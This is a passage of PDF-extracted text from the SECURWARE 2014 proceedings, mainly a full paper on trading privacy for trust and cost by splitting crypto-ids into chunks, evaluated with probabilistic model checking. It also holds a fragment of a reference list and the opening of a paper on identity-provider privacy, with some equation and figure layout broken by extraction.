drop [accessed: 2014-07-26].
L. Hutchinson, “Solid-state revolution: in-depth on how SSDs
really work,” 2014, URL: http://arstechnica.com/informationtechnology/2012/06/inside-the-ssd-revolution-how-solidstate-disks-really-work/2/ [accessed: 2014-07-25].
G. B. Bell and R. Boddington, “Solid state drives: the beginning
of the end for current practice in digital forensic recovery?”
vol. 5, no. 3. Association of Digital Forensics, Security and
Law, 2010, pp. 1–20.
C. King and T. Vidas, “Empirical analysis of solid state disk
data retention when used with contemporary operating systems,” vol. 8. Elsevier, 2011, pp. S111–S117.
Y. Rebahi, J. J. Pallares, N. T. Minh, S. Ehlert, G. Kovacs, and
D. Sisalem, “Performance analysis of identity management in
the session initiation protocol (sip),” in Computer Systems and
Applications, 2008. AICCSA 2008. IEEE/ACS International
Conference on. IEEE, 2008, pp. 711–717.
E. Huebnera, D. Bema, and C. K. Wee, “Data hiding in the
ntfs file system,” vol. 3, 2006, pp. 211–226.
D.Verhasselt, “Hide data in bad blocks,” 2009, URL:
http://www.davidverhasselt.com/2009/04/22/hide-datain-bad-blocks/ [accessed: 2009-04-22].
A. D. McDonald and M. G. Kuhn, “Stegfs: A steganographic
file system for linux,” in Information Hiding. Springer, 2000,
pp. 463–477.
Grugq, “The art of defiling: Defeating forensic analysis on unix
file systems,” Black Hat Conference, 2005.
I. Thompson and M. Monroe, “Fragfs: An advanced data
hiding technique,” 2004, URL: http://www.blackhat.com/
presentations/bh-federal-06/BH-Fed-06-Thompson/BH-Fed06Thompson-up.pdfTrueCrypt(2006) [accessed: 2014-6-02].
H. Khan, M. Javed, S. A. Khayam, and F. Mirza, “Designing
a cluster-based covert channel to evade disk investigation and
forensics,” vol. 30, no. 1. Elsevier, 2011, pp. 35–49.
74
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
[13]
[14]
[15]
[16]
[17]
[18]
A. Srinivasan, S. Kolli, and J. Wu, “Steganographic information hiding that exploits a novel file system vulnerability,” in
International Journal of Security and Networks (IJSN), vol. 8,
no. 2, 2013, pp. 82–93.
A. Srinivasan, S. T. Nagaraj, and A. Stavrou, “Hideinside –
a novel randomized & encrypted antiforensic information hiding,” in Computing, Networking and Communications (ICNC),
2013 International Conference on. IEEE, 2013, pp. 626–631.
A. Nisbet, S. Lawrence, and M. Ruff, “A forensic analysis
and comparison of solid state drive data retention with trim
enabled file systems,” in Proceedings of 11th Australian Digital
Forensics Conference, 2013, pp. 103–111.
Y. Wang, W.-k. Yu, S. Q. Xu, E. Kan, and G. E. Suh, “Hiding
information in flash memory,” in Proceedings of the 2013 IEEE
Symposium on Security and Privacy, S&P’13. IEEE Computer
Society, 2013, pp. 271–285.
“OpenSSDWiki,” 2013, URL: http://www.openssd-project.org
[accessed: 2013-04-25].
“Barefoot,” 2014, URL: http://en.wikipedia.org/wiki/Indilinx
[accessed: 2013-10-02].
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
75
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Saving Privacy in Trust-Based User-Centric Distributed Systems
Alessandro Aldini
Dipartimento di Scienze di Base e Fondamenti
University of Urbino “Carlo Bo”
Urbino, Italy
Email: alessandro.aldini@uniurb.it
Abstract—User-centricity is a design philosophy subsuming new
models of Internet connectivity and resource sharing, whose
development is mainly driven by what users offer and require.
To promote user-centric services and collaborative behaviors,
incentives are needed that are typically based on trust relations
and remuneration. In this paper, we show that privacy-preserving
mechanisms can favor user’s involvement if privacy can be traded
with trust and cost. In particular, we present and evaluate
formally a model ensuring an adequate level of flexibility among
privacy, trust, and cost in the setting of distributed systems.
Keywords–Cooperation incentives; trust; privacy; remuneration;
user-centric networks; model checking.
I.
I NTRODUCTION
Nowadays, user-driven services, like personal hotspot and
peer-to-peer, are playing a fundamental role in the reshaping
of the Internet value chain [1]. Essentially, they focus on the
user experience, related needs, expectations, and attitude to
cooperation. One of the key factors behind the success of
community-scale user-centric initiatives is given by the user
involvement as a prosumer, i.e., an actor combining the roles
of service producer and consumer. Such an involvement must
be strengthened through the adoption of incentive mechanisms
stimulating the willingness to collaborate. In particular, even
if cooperation is a natural consequence of sense of community
and synergy, it cannot be taken for granted because of typical
obstacles like, e.g., selfishness and, even worse, cheating,
which represent a threat keeping users from trusting other
community members.
Establishing trust relations among users is the objective of
explicit trust and reputation systems, among which we concentrate on those aiming at providing computational estimations
of user’s trustworthiness as perceived by the community [2].
Basically, these estimations work effectively as an incentive
to collaborate if they represent parameters influencing access
to services at favorable conditions, among which we include
the service cost as one of the most important aspects affecting the perceived quality of experience. At the same time,
remuneration is another kind of incentive used to stimulate
cooperation [3]. Whenever combined with trust, it enables a
virtuous circle for the proliferation of user-centric services.
Trust is a concept that may involve and justify the collection of personally identifiable sensitive information, which in
many real situations contrasts dramatically the idea of privacy
and plays a deterrent role when users are getting involved
in interactions. In particular, the lower the attitude to expose
sensitive information is, the higher the probability of being
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
untrusted when negotiating a service. Trading privacy for trust
is thus a way for balancing the subjective value of what is
revealed in exchange of what is obtained.
The above considerations suggest that an efficient cooperation infrastructure depends on the tradeoff among trust, privacy,
and cost. As shown recently [4], these three dimensions can be
balanced in order to favor collaborative behaviors depending
on specific user’s needs in terms of social (e.g., personal
sensibility to trust and privacy issues) and economical (e.g.,
in terms of costs that can be afforded) requirements. More
precisely, in the model proposed in [4], a balanced tradeoff
is guaranteed by a centralized system in which reputation is
managed by a trusted third party (TTP) collecting information
about every transaction completed, while keeping the desired
level of privacy for every user involved. In this paper, we
provide a twofold contribution. On one hand, we show how
to implement the model of [4] in the setting of distributed
systems that cannot rely on TTP. On the other hand, we
validate formally such a model through model checking based
analysis [5]. This validation is done in the setting of a cooperation system that has been recently proposed to implement
trust and remuneration based incentive mechanisms [6].
In the rest of this section, we comment on related work.
In Section II, we briefly recall the model of [4] and then
we illustrate a distributed solution for its implementation. In
Section III, we estimate the validity of such a model in the
setting of a real-world case study. Finally, some conclusions
terminate the paper in Section IV.
A. Related Work
Making trust and service cost mutual dependent is a
winning strategy if the aim is to stimulate honest behaviors
while keeping users from cheats and selfishness [6]–[8], as
also proved formally by means of formal methods, like game
theory and model checking [9]–[13].
The contrast between privacy and trust is investigated
in [14], where it is shown that these two aspects can be
traded by employing a mechanism based on pseudonyms. In
practice, users create freely pseudonyms identified by the socalled crypto-id, i.e., the hash of the public key of a locally
generated asymmetric cryptography key pair. Then, in different
environments, a user can use different pseudonyms to carry
out actions logged as events signed with the private key of
the chosen pseudonym. If needed to acquire more reputation,
several pseudonyms can be linked together in order to augment
the number of known actions and potentially increase the trust
76
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
in the linked entity. Notice that in approaches such as this one
the link is irrevocable.
of which we know value and position. Amount and position
of 1’s occurrences in the bitmask are under Alice’s control.
Incentive mechanisms are proposed in [15] to achieve a
balanced tradeoff between privacy and trust in the setting of
data-centric ad-hoc networks. In [16], such an interplay is
formulated as an optimization problem in which both privacy
and trust are expressed as metrics. In [17], trust towards
an entity is used to take decisions about the amount of
sensitive information to reveal to the entity. Further works on
unlinkability [18] and pseudonymity [19] [20] provide insights
on the tradeoff between privacy and trust.
The transaction is then identified by the chunk chosen
by Alice, together with the proof (which can be validated
in Zero Knowledge) of being a proper owner of the chunk
exposed. Therefore, a trust value (and related variation due
to the feedback following the transaction execution) is not
associated with Alice directly, but is related to the chunk of bits
extracted from Alice’s crypto-id through the chosen bitmask. In
general, the same chunk is potentially shared by other cryptoids belonging to several different users. In future interactions,
Alice may select other chunks of her crypto-id. Moreover, she
can also spend a set of different chunks of the crypto-id in
order to exploit a combination of the trust levels associated
with each of these chunks. Ideally, the overall trust associated
with a crypto-id shall result from a combination of the trust
values accumulated by every chunk of such a crypto-id spent
in previous interactions. Thanks to the uncertainty relating
chunks and associated owners, every time Alice exposes a
chunk to Bob in order to negotiate a transaction, Bob cannot
link the current transaction to any of the previous transactions
conducted (by Alice or by other users) by using the same (or
a portion of the current) chunk.
With respect to previous work, the novelty of the approach
proposed in [4] is twofold. On one hand, the analysis of the
tradeoff between privacy and trust takes into account also the
service cost. On the other hand, it overcomes the limitations of
the existing approaches, in which sensitive information linking
is irrevocable and the privacy disclosure is incremental.
II.
A M ODEL FOR I NDEPENDENT R ELEASE OF P RIVACY
In a classical view of privacy, a user exposes (part of)
personal information in order to be trusted enough to get access
to the service of interest. In other words, privacy disclosure is
traded for the amount of reputation that the user may need
to be considered as a trustworthy partner in some kind of
negotiation in which, e.g., service cost may depend on trust.
Typically, once different pieces of sensitive information (e.g.,
credentials, virtual identities, or simply the proof of being the
user involved in a transaction previously conducted), say I1
and I2 , are linked and exposed to be trusted by someone else,
then such a link is irrevocably released. In this sense, we say
that the disclosure of sensitive information is incremental along
time.
In order to exemplify, as discussed in [14], I1 and I2
may identify two different transactions conducted by the user
under two different pseudonyms, each one revealing different
personal information about her. The user is obviously able to
show that both I1 and I2 are associated with the same user
and, if such a proof is provided, I1 and I2 become irrevocably linked together. As opposite to this scenario, in [4] an
alternative, independent model of privacy release is proposed
in which the link is not definitive. In order to work properly,
such a model requires some form of uncertainty associated
with the owners of specific actions. Basically, this is obtained
by sharing pseudonyms among different users. Similarly as
in [14], a virtual identity is represented by a crypto-id, which
can be calculated using the SHA-3 cryptographic hash function
over the public key of the user. Then, the basic idea of
the independent model of privacy release is that trust and
transactions are mapped to pieces of the crypto-id rather than
to the crypto-id as a whole.
Let us explain such a mechanism through a typical handshake between Alice, who issues a service request, and Bob,
who offers the service. Instead of revealing to be Alice,
she accompanies the request with a portion of her crypto-id
identified by applying a bitmask to the crypto-id through the
bitwise AND operation. For the sake of presentation, consider
a 8-bit crypto-id, e.g., 10010101, from which we obtain the
portion 00010000, called chunk, when applying the bitmask
00010010. Hence, a chunk is a subset of bits of the crypto-id,
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
While in [4] the model above relies on the presence of a
TTP managing chunk’s reputation, in the following we tackle
the problem of implementing the same idea in the setting of
distributed systems without central authority and any prior
knowledge about crypto-ids, which represent a more realistic
scenario in several user-centric networks.
A. Design for Distributed Systems
Handling trust towards users by tracing the usage of
(possibly shared) chunks is a hard task in the absence of a
centralized reputation system. To deal with this problem, in
order to estimate user’s trustworthiness we define a local trust
structure that allows any user offering a service to associate a
trust value with every chunk received to negotiate the service.
Let C be the set of chunks with which the user has
interacted in completed transactions and T be the trust domain,
which we assume to be numeric and totally ordered. Chunks
are ranged over by C, C ′ , . . .. Sometimes, we use the notation
CB to define a chunk identified by bitmask B and CB [i] (resp.,
B[i]) to denote the value of the i-th bit of the chunk (resp.,
bitmask). Set C forms a partially ordered set (poset, for short),
(C, ≤), where the refinement operator ≤ is defined as follows.
Definition 1 (Chunk refinement): Let n be the crypto-id
size. Given chunks CB , CB ′ , we say that CB ′ refines CB ,
denoted CB ≤ CB ′ , if and only if:
•
for all 1 ≤ i ≤ n: B[i] ≤ B ′ [i];
•
for all 1 ≤ i ≤ n: if B[i] = 1 then CB [i] = CB ′ [i].
Notice that if CB ≤ CB ′ then B is a submask of B ′ and the
information exposed by CB ′ includes that revealed by CB . If
two chunks are related through ≤ then they could be originated
from the same crypto-id. As we will see, maintaining the
poset structure provides the means to approximate the trust
towards any (possibly unknown) crypto-id by employing the
trust related to the potential constituting chunks.
77
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
C1 : 00011000
✶
✏✏
C2 : 00011000 P
✏
✶
✶ C3 : 00000100
✐
✏
✏✏
P
C5 : 00000000
C4 : 00010000
✐P
P
✐P
P
C7 : 00000000
C6 : 00010000
C1 : 45 C2 : 30 C3 : 35 C4 : 15 C5 : 25 C6 : 10 C7 : 5
Figure 1. Example of a local trust structure.
Each element of the poset (C, ≤) is labeled by a value
of the trust domain T . Such a value represents the trust of
the user towards the related chunk resulting from interactions
associated with such a chunk. Formally, we denote such an
extended structure with (C, ≤, t), where t : C → T defines
the mapping from chunks to trust values. Initially, for every
unknown chunk C with which the user interacts for the first
time, we assume t(C) to be equal to the dispositional trust
dt of the user, which represents the attitude to cooperate with
unknown users.
Example: Figure 1, which in the following we use as
running example, shows the graphical representation of a poset,
where, e.g., C6 ≤ C4 ≤ C2 ≤ C1 , as well as C7 ≤ C5 ≤
C3 , while, e.g., C6 and C3 are not related with each other.
Moreover, the figure reports also the trust associated with each
known chunk at a given instant of time, by assuming the trust
domain [0, 50].
To emphasize the nature of the independent model of
privacy release, notice that even if Alice invested chunk C1
in a past interaction with Bob, whose reference trust structure
is that depicted in Figure 1, then in the current transaction
she may use chunk C2 only, while Bob cannot infer the link
between the user of the past interaction associated with C1
and the current one. As a side effect, notice also that all the
users with a crypto-id matching with C2 actually benefit from
the trust (or pay the mistrust) associated with C2 .
The obfuscation mechanism illustrated in the example
above, which is crucial for the requirements of the independent
model of privacy release, can be viewed as an additional
incentive to take collaborative and honest decisions, as a
high number of crypto-id chunks highly trusted contribute to
increase the probability of obtaining services at a reasonable
cost by preserving the desired level of privacy.
A fundamental issue for any trust system is given by the
transaction feedback that induces a trust variation influencing
the trust t(C) towards the chunk C associated with the transaction. In our setting, it is worth observing that such a feedback
should be weighted by the chunk size. More precisely, the user
can decide to apply a discounting factor to the feedback result
that is inversely proportional to the size of the chunk, in order
to reflect that the amount of sensitive information exposed is
proportional to the trustworthiness as perceived by the user.
Example: As a consequence of a positive transaction
conducted through chunk C2 and resulting in a trust variation
equal to, e.g., +5, we would obtain t(C2 ) = 32.5 if the
discounting factor is applied, and t(C2 ) = 35 otherwise.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
On the other hand, it is also worth deciding whether and
how the feedback related to chunk C has to be propagated
to other elements of the trust structure (C, ≤, t). Since propagation would result in ambiguity if applied to chunks of
the poset that cannot be related through ≤, let us examine
the remaining cases. Depending on the feedback, which can
be either positive or negative, and the propagation direction
(towards finer or coarser chunks, or else both), every possible
combination gives rise to a different propagation policy. For
instance, in order to advocate a conservative policy, variations
shall not be propagated to elements that refine C, because an
interaction disclosing a small amount of sensitive information
should not affect the trust level of chunks that expose more
information. This policy contrasts also potential attacks by
users preserving their identity and aiming at penalizing the
trust of small chunks shared by a large number of users.
On the other hand, in order to fully exploit the flexibility of
the independent model of privacy release, it would be worth
propagating the trust variation for C to every chunk C ′ in
the poset that is refined by C. In this case, the trust variation
for C ′ is discounted by a factor proportional to the difference
between the size of C and the size of C ′ . In practice, the larger
the difference between C and C ′ is, the slighter the impact of
the trust variation of C upon C ′ .
Example: Consider chunk C2 and the positive transaction
of the previous example determining t(C2 ) = 32.5. Then, by
virtue of the propagation policy discussed above we have, e.g.,
t(C4 ) = 16.25 and t(C1 ) = 45.
As another important assumption, so far we assumed that
any new chunk C that is added to the poset is initially
associated with the dispositional trust of the user. Alternatively,
the trust structure (C, ≤, t) can be employed to infer some
trust information about C. Based on the same intuition behind
feedback propagation, the trust values associated with known
chunks that are in some relation with C can be combined. In
fact, we can interpret C as an approximation of such chunks,
which, however, must be pairwise unrelated by ≤ to avoid
redundancy when counting the related trust values.
By following the conservative policy previously discussed,
we initialize the trust towards C on the basis of the trust values
associated with chunks that refine C.
Definition 2 (Chunk coverage): Given a trust structure
(C, ≤, t) and a chunk C 6∈ C, a coverage for C is a set
{C1 , . . . Cm } ⊆ C such that:
•
Ci 6≤ Cj for all 1 ≤ i, j ≤ m;
•
C ≤ Ci for all 1 ≤ i ≤ m.
The initial trust associated
with C by the coverage
Pm
1
{C1 , . . . Cm } is m
· i=1 t(Ci ).
Since in the poset several different coverages may exist
for a chunk C, we can adopt different policies to select
one of them, e.g., by choosing the coverage inducing the
highest/lowest trust, or by keeping all of them and then
calculating the average trust.
Example: A coverage for chunk C8 : 00000000 is the set
{C4 , C5 }, which determines the initial trust value 20. Other
candidates are {C2 , C3 }, {C3 , C4 }, and {C1 }. The average
trust resulting from all the possible coverages is 30.625.
78
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
In general, from the effectiveness standpoint, the trust
structure (C, ≤, t) is used to manage locally information
(about chunk’s trust) allowing the user to approximate the
trust towards other users, without any knowledge about their
crypto-ids and actual behaviors. As far as efficiency issues are
concerned, in order to circumvent the problem of dealing with
a huge trust structure, it is possible to constrain the choice
of the bitmask, e.g., by fixing a priori a rule for splitting the
crypto-id into a limited set of chunks.
B. Service Cost Model
Finally, we emphasize that the presentation of the proposed
design model abstracts away from the specific trust metric
adopted. Indeed, basically, our method may be integrated with
any computational notion of trust and with any recommendation mechanism used in classical trust systems for distributed
environments [21] [22].
The cost function proposed in [6] expresses linear dependence between trust and cost:
min
· (T ′ − T ) if T < T ′
Cmin + CmaxT−C
′
(2)
C(T ) =
Cmin
otherwise
III.
F ORMAL V ERIFICATION
In this section, we evaluate the proposed independent
model of privacy release through a comparison with an abstraction of standard approaches in which information linking
is irrevocable, in the following called incremental model of
privacy release. To this aim, we employ the model checker
PRISM [23] [24] [5], through which it is possible to build
automatically probabilistic models – like discrete-time Markov
chains and Markov decision processes – from state-based
formal specifications. On the semantic models deriving from
formal descriptions, quantitative properties expressed in probabilistic extensions of temporal logics are verified through
model checking techniques.
The comparison is conducted by assuming that the two
models of privacy release are applied in the setting of a realworld cooperation system [6], in which users providing services, called requestees, and recipients of such services, called
requesters, are involved in a cooperation process balancing
trustworthiness of each participant with access to services and
related costs. In the following, we omit the specification of the
formal description given in the PRISM modeling language and
we briefly introduce the original trust model and its relation
with service remuneration [6]. Then, we describe our modeling
assumptions and the metrics that are used to evaluate how
trading privacy for trust influences access to services and
related costs. We finally discuss the obtained results.
A. Trust Model
Trust is a discrete metric with values ranging in the interval
[0, 50], such that null = 0, low = 10, med = 25, and high =
40. The trust Tij of user i towards any credential j (which can
be, e.g., a crypto-id chunk or an entity identity) is modeled
abstractly as follows:
Tij = α · trust ij + (1 − α) · recs ij
(1)
Parameter α ∈ [0, 1] is the risk factor balancing personal
experience with recommendations by third parties. The trust
metric trust ij is the result of previous direct interactions of
i with j. Initially, trust ij is set to the dispositional trust of
i, denoted by dt i . After each positive interaction, trust ij is
incremented by a factor v. Parameter recs ij is the average of
the trust metrics towards j recommended to i by other users.
For each service type, the service trust threshold st represents
the minimum trust required to negotiate the service.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
The joint combination of trust and remuneration is implemented by making the service cost function dependent on the
trust T of the requestee towards the requester credential. The
other main parameters are: Cmin , which is the minimum cost
asked by the requestee regardless of trust, Cmax , which is
the maximum cost asked to serve untrusted requests, and the
threshold values T ′ and T ′′ , such that T ′′ < T ′ .
In order to examine thoroughly the trust/cost tradeoff, we
consider two more functions approximating the linearity of the
relation between trust and cost. In particular, a simple one-step
function is as follows:
C(T ) =
Cmax
Cmin
if T < T ′
otherwise
(3)
while a possible two-steps function is as follows:
C(T ) =
(
Cmax
if T < T ′′
Cmax /2 if T ′′ ≤ T < T ′
Cmin
otherwise
(4)
C. Modeling Assumptions
Our objective is to compare the model of incremental
release of privacy (represented in the figures by the curves
named inc) with the model of independent release of privacy
(represented in the figures by the curves named ind ). For the
sake of uniformity, for both models we assume abstractly that
privacy is released (through the pseudonyms mechanism [14]
and through the chunk mechanism, respectively) as a percentage of the total amount of sensitive information that the
user may disclose. Similarly, in every trust-based formula we
consider percentages of the trust involved.
The experiments are conducted by model checking several
configurations of the system against formulas expressed in
quantitative extensions of Computation Tree Logic [5]. For
instance, Figure 2 refers to one requester interacting with one
requestee with the aim of obtaining 10 services that can be
of three different types. The figure reports the results for the
best strategy, if one exists, allowing the requester to get access
to all the services requested by minimizing the total expected
cost (reported on the vertical axis) depending on the amount
of revealed sensitive information (reported on the horizontal
axis). The choice of the amount of privacy to spend for each
request is under the control of the requester. The choice of
the service type is either governed by the requester, or it is
probabilistic with uniform distribution (see the curves denoted
by prob in the figure). Requestee’s parameters are dt = med
and v = 5, as we assume that each transaction induces a
positive feedback. The three service types are characterized
by st 1 = null and (2), st 2 = low and (3), st 3 = med and (4),
respectively. The service cost parameters are Cmin = 0,
Cmax = 10, T ′ = high, and T ′′ = med .
79
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
(a) Equation (2).
Figure 2. Trading cost for privacy.
We complete the comparison with an experiment assuming
one requester and two requestees, which are chosen nondeterministically by the requester. The number of issued requests
is 10, while we consider only the first type of service. The
analysis, reported in Figure 3, proposes the results obtained
by changing the service cost function. Requestee’s trust parameters are as follows: dt = med , st = null , α = 0.5.
D. Discussion
We now comment on the obtained results, by first considering Figure 2, which reveals two interesting behaviors.
(b) Equation (3).
Firstly, if the choice of the service is under the control of
the requester, then the difference between the two models is
significant only for values of the privacy release higher than
70%. In order to interpret this result, we checked the best
requester’s strategy, which consists of choosing always the
service offering the best ratio trust/cost, i.e., the one using (2).
Whenever trust is high enough to apply the minimum cost, then
it turns out to be convenient to select also the other two service
types. According to this strategy, if the privacy disclosure is
below 70% it happens that trust does not reach the threshold
T ′ . Therefore, as a consequence of (2), the relation between
trust and cost is always linear and the two privacy models
turn out to be equivalent from the economic standpoint. On
the other hand, if the requester is highly trustworthy, then
the cost to pay becomes constantly equal to the minimum
cost, meaning that the requester could invest less privacy to
obtain the same cost, thus revealing the advantages of the
independent model. In practice, independently of the privacy
model, it is economically convenient for the requester to
disclose the information needed to obtain rapidly the best cost.
Instead, for high levels of trust, it would be convenient for
requester’s privacy to reduce as much as possible the amount
of disclosed information. Whenever identity of the requester
is always fully disclosed, then the two models experience the
same performance.
privacy is not guaranteed. However, such a minimum value is
considerably higher for the incremental model, in which case
at least an average privacy release of 92% is needed. Hence,
if the requester is somehow forced to require certain services,
then the independent model performs better.
Secondly, if the choice of the service is probabilistic, thus
modeling, e.g., a situation in which the requester may require
every type of service independently of their cost, then it is not
possible to satisfy all the requests if a minimum disclosure of
The role of the service cost function is emphasized by the
curves of Figure 3, which show that whenever a step function
is used, the independent model is able to exploit better the
intervals of trust in which the service cost is constant.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
(c) Equation (4).
Figure 3. Trading cost for privacy by varying cost function.
80
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
In the previous experiments, priority is given to cost and
to the average disclosure of privacy needed to optimize such
a cost. However, if cost is not a fundamental issue, then
the tradeoff of interest concerns trust and privacy. In order
to analyze such a tradeoff, we reformulate the experiment
of Figure 2 by focusing on the optimization of the average
percentage of privacy release needed to obtain 10 services
of a given type. In particular, we consider the second and
third service types, for which the service trust threshold is
low and med, respectively. Since to obtain such services the
requester must be trusted by the requestee, we examine the
tradeoff between such a trust and requester’s privacy. For
the second (resp., third) service type, the average percentage
of privacy release is 38% (resp., 92%) when applying the
incremental model, while it is equal to 28% (resp., 64%) in
the case of the independent model. Therefore, the observed
values show that through the independent model we obtain
all the required services by disclosing much less privacy
than through the incremental model. The related difference
is directly proportional to the trust threshold needed to obtain
the services.
[5]
[6]
[7]
[8]
[9]
[10]
[11]
[12]
IV.
C ONCLUSION
The attitude to cooperation is strongly affected by the
tradeoff existing among privacy and trustworthiness of the
involved parties and cost of the exchanged services. In order to balance the related incentive mechanisms, it is worth
considering the constraints of the model of privacy release.
Thanks to a mechanism based on the splitting of crypto-ids, it
is possible to manage the disclosure of sensitive information
in a less restrictive way with respect to classical models, even
in distributed environments.
[13]
The formal evaluation has emphasized that the flexibility
of the independent model ensures better performance with
respect to the incremental model. This is always true if the
main objective is trading privacy for trust. If services must be
paid and cost depends on trust, then the adopted cost function
affects the tradeoff among privacy, trust, and cost, by revealing
the advantages of the independent model in the intervals of
trust values in which cost is constant.
[16]
As work in progress, the integration of the proposed
distributed trust system with the centralized reputation system
of [4] is under development. Moreover, a successful deployment of the proposed model is strictly related to the choice
of the trust policies and configuration parameters discussed in
Section II, which are currently subject to sensitive analysis
through formal verification.
[14]
[15]
[17]
[18]
[19]
[20]
[21]
[22]
R EFERENCES
[1]
[2]
[3]
[4]
A. Aldini and A. Bogliolo, Eds., User-Centric Networking – Future
Perspectives, ser. Lecture Notes in Social Networks. Springer, 2014.
A. Jøsang, “Trust and reputation systems,” in Foundations of Security
Analysis and Design IV (FOSAD’07), ser. LNCS, A. Aldini and
R. Gorrieri, Eds. Springer, 2007, vol. 4677, pp. 209–245.
S. Greengard, “Social games, virtual goods,” Communications of the
ACM, vol. 54, no. 4, 2011, pp. 19–22.
A. Aldini, A. Bogliolo, C. Ballester, and J.-M. Seigneur, “On the
tradeoff among trust, privacy, and cost in incentive-based networks,” in
8th IFIP WG 11.11 Int. Conf. on Trust Management, ser. IFIP AICT,
J. Zhou et al., Eds., vol. 430. Springer, 2014, pp. 205–212.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[23]
[24]
V. Forejt, M. Kwiatkowska, G. Norman, and D. Parker, “Automated
verification techniques for probabilistic systems,” in Formal Methods
for Eternal Networked Software Systems, ser. LNCS, M. Bernardo and
V. Issarny, Eds. Springer, 2011, vol. 6659, pp. 53–113.
A. Bogliolo et al., “Virtual currency and reputation-based cooperation
incentives in user-centric networks,” in 8th Int. Wireless Communications and Mobile Computing Conf. (IWCMC’12). IEEE, 2012, pp.
895–900.
Y. Zhang, L. Lin, and J. Huai, “Balancing trust and incentive in peer-topeer collaborative system,” Journal of Network Security, vol. 5, 2007,
pp. 73–81.
M. Yildiz, M.-A. Khan, F. Sivrikaya, and S. Albayrak, “Cooperation
incentives based load balancing in UCN: a probabilistic approach,” in
Global Communications Conf. (GLOBECOM’12). IEEE, 2012, pp.
2746–2752.
Z. Li and H. Shen, “Game-theoretic analysis of cooperation incentives
strategies in mobile ad hoc networks,” IEEE Transactions on Mobile
Computing, vol. 11, no. 8, 2012, pp. 1287–1303.
A. Aldini and A. Bogliolo, “Model checking of trust-based user-centric
cooperative networks,” in 4th Int. Conf. on Advances in Future Internet
(AFIN2012). IARIA, 2012, pp. 32–41.
A. Aldini, “Formal approach to design and automatic verification of
cooperation-based networks,” Journal On Advances in Internet Technology, vol. 6, 2013, pp. 42–56.
M. Kwiatkowska, D. Parker, and A. Simaitis, “Strategic analysis of
trust models for user-centric networks,” in Int. Workshop on Strategic
Reasoning (SR’13), vol. 112. EPTCS, 2013, pp. 53–60.
A. Aldini and A. Bogliolo, “Modeling and verification of cooperation
incentive mechanisms in user-centric wireless communications,” in
Security, Privacy, Trust, and Resource Management in Mobile and
Wireless Communications, D. Rawat, B. Bista, and G. Yan, Eds. IGI
Global, 2014, pp. 432–461.
J.-M. Seigneur and C.-D. Jensen, “Trading privacy for trust,” in 2nd
Int. Conf. on Trust Management (iTrust’04), ser. LNCS, vol. 2995.
Springer, 2004, pp. 93–107.
M. Raya, R. Shokri, and J.-P. Hubaux, “On the tradeoff between trust
and privacy in wireless ad hoc networks,” in 3rd ACM Conf. on Wireless
Network Security (WiSec’10), 2010, pp. 75–80.
L. Lilien and B. Bhargava, “Privacy and trust in online interactions,”
in Online Consumer Protection: Theories of Human Relativism. IGI
Global, 2009, pp. 85–122.
W. Wagealla, M. Carbone, C. English, S. Terzis, and P. Nixon, “A
formal model of trust lifecycle management,” in Workshop on Formal
Aspects of Security and Trust (FAST’03), 2003.
S. Köpsell and S. Steinbrecher, “Modeling unlinkability,” in 3rd
Workshop on Privacy Enhancing Technologies, ser. LNCS, vol. 2760.
Springer, 2003, pp. 32–47.
I. Goldberg, “A pseudonymous communications infrastructure for the
internet,” Ph.D. dissertation, University of California at Berkeley, 2000.
A. Kobsa and J. Schreck, “Privacy through pseudonymity in useradaptive systems,” ACM Transactions on Internet Technology, vol. 3,
no. 2, 2003, pp. 149–183.
S.-D. Kamvar, M.-T. Schlosser, and H. Garcia-Molina, “The eigentrust
algorithm for reputation management in p2p networks,” in 12th Conf.
on World Wide Web (WWW’03). ACM, 2003, pp. 640–651.
R. Zhou and K. Hwang, “Powertrust: a robust and scalable reputation
system for trusted peer-to-peer computing,” IEEE Transactions on
Parallel and Distributed Systems, vol. 18, no. 4, 2007, pp. 460–473.
T. Chen, V. Forejt, M. Kwiatkowska, D. Parker, and A. Simaitis, “Prismgames: a model checker for stochastic multi-player games,” in 19th Int.
Conf. on Tools and Algorithms for the Construction and Analysis of
Systems (TACAS’13), ser. LNCS, vol. 7795. Springer, 2013, pp. 185–
191.
M. Kwiatkowska, G. Norman, and D. Parker, “Prism 4.0: verification of
probabilistic real-time systems,” in 23rd Int. Conf. on Computer Aided
Verification (CAV’11), ser. LNCS, vol. 6806. Springer, 2011, pp. 585–
591.
81
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Enhancing Privacy on Identity Providers
Rafael Weingärtner
Carla Merkle Westphall
Department of Informatics and Statistics
Networks and Management Laboratory
Federal University of Santa Catarina
Florianópolis, Brazil
Email: {weingartner, carla}@lrg.ufsc.br
Abstract—Cloud computing is widely used to provide on demand
services as a consequence of its benefits such as reduced costs,
structure flexibility and agility on resource provisioning. However,
there are still people that are not comfortable with the idea of
sending their sensitive data to the cloud such as the personally
identifiable information (PII) that could be used to identify
someone in the real world. Moreover, there have been cases of
data leaks, which resulted in huge losses both for companies
and its clients. Therefore, this article addresses the security and
privacy aspects of identity management. We present a model that
tackles privacy issues within the PII that is stored on identity
providers (IdPs). Thus, our proposal supports users and improves
theirs awareness when disseminating PIIs.
Keywords–Cloud Computing; Security; Privacy; Federation;
Identity providers;
I. Introduction
Cloud computing is been largely adopted to provide services to industry. As presented in [1] and [2], the reduced
costs, flexibility and agility are the main characteristics for the
widespread successful of cloud computing. However, there are
people that are not comfortable to send their sensitive data to
the cloud [3]. Moreover, it is pointed out by the Cloud Industry
Forum in [2] that when the cloud is in discussion there are
huge debates not about the technology aspect per se, but rather
about the commercial and governance issues that relate to data
security and privacy.
